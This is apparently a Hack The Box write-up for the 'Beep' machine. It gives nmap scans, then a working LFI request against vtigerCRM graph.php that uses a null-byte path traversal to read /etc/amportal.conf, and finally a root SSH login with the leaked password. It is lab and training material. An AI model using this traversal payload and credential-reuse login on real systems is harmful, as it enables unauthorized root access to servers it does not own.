Beep
Beep is an easy Linux box running Elastix where a path traversal flaw in vtigerCRM's graph.php leaks /etc/amportal.conf containing a plaintext password that is reused for root SSH, giving immediate full access.
Overview
Beep is an easy-difficulty Linux box running Elastix, a VoIP PBX distribution built on Asterisk and bundled third-party web applications including vtigerCRM. The attack chain is two steps: a path traversal flaw in vtigercrm/graph.php reads /etc/amportal.conf via a null-byte bypass, leaking a plaintext password; that same password is the root SSH password, so a single sshpass command delivers a root shell with both flags readable immediately.
Machine Matrix
Real-Life dominates because path traversal plus credential reuse is a classic real-world finding; CVE is moderate reflecting a known public LFI; Custom Exploitation is zero since only wget and sshpass were needed.
Recon
| Port | Service | Notes |
|---|---|---|
| 22 | SSH | OpenSSH 4.3 (CentOS 5, legacy algorithms required) |
| 25 | SMTP | Postfix |
| 80 | HTTP | Redirects to HTTPS |
| 110 | POP3 | Dovecot |
| 111 | rpcbind | |
| 143 | IMAP | Dovecot |
| 443 | HTTPS | Elastix PBX login page |
| 993 | IMAPS | |
| 995 | POP3S | |
| 3306 | MySQL | |
| 5038 | Asterisk | AMI management interface |
| 10000 | Webmin | Miniserv 1.570 |
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,25,80,110,111,143,443,993,995,3306,5038,10000 -sC -sV -Pn 10.10.10.X
Port 443 is the most interesting — it presents an Elastix login page, which bundles vtigerCRM as an embedded application and is well-known for a PHP null-byte path traversal in an older graph.php endpoint.
Enumeration
Visiting https://10.10.10.X/ (ignoring the self-signed cert) confirms the Elastix splash screen. Navigating to /vtigercrm/ reveals the bundled vtigerCRM instance. The graph.php script in vtigerCRM accepts a current_language parameter that is passed directly to a file-open call without sanitising ../ sequences or null bytes — a textbook path traversal / LFI.
1
2
3
wget -q --no-check-certificate \
"https://10.10.10.X/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action" \
-O /tmp/amportal.txt
The %00 null byte terminates the string before PHP appends a .php extension (a behaviour fixed in PHP 5.3.4 — this box runs an older version). The response body is the raw contents of /etc/amportal.conf.
1
grep -iE "AMPDBPASS|AMPMGRPASS|ARI_ADMIN_PASSWORD" /tmp/amportal.txt | grep -v "^#"
All three password variables resolve to the same value: jEhdIekWmdjE. This is an exposure of sensitive information combined with plaintext credential storage in a world-readable config file.
Foothold
With the password in hand, attempt SSH as root. Because the box runs OpenSSH 4.3 on CentOS 5, modern clients refuse the connection unless legacy key-exchange and cipher options are explicitly enabled — without these flags the error looks identical to a wrong password:
1
2
3
4
5
sshpass -p 'jEhdIekWmdjE' ssh [email protected] \
-o StrictHostKeyChecking=no \
-o KexAlgorithms=+diffie-hellman-group1-sha1 \
-o HostKeyAlgorithms=+ssh-rsa \
-o Ciphers=+aes128-cbc,3des-cbc
The shell opens as uid=0(root) — credential reuse between the Asterisk application config and the system root account gives immediate full access.
User flag
1
cat /home/fanis/user.txt # HTB{...}
We land directly as root, so the user flag in /home/fanis/user.txt is readable from the same shell — no lateral movement required.
Privilege Escalation
None required. The LFI disclosed the root SSH password directly, and the SSH session authenticated as root (uid=0). Both flags are readable from the initial shell without any privilege escalation step.
Root flag
1
cat /root/root.txt # HTB{...}
Full system compromise achieved in two commands — the LFI plus a single SSH login as root.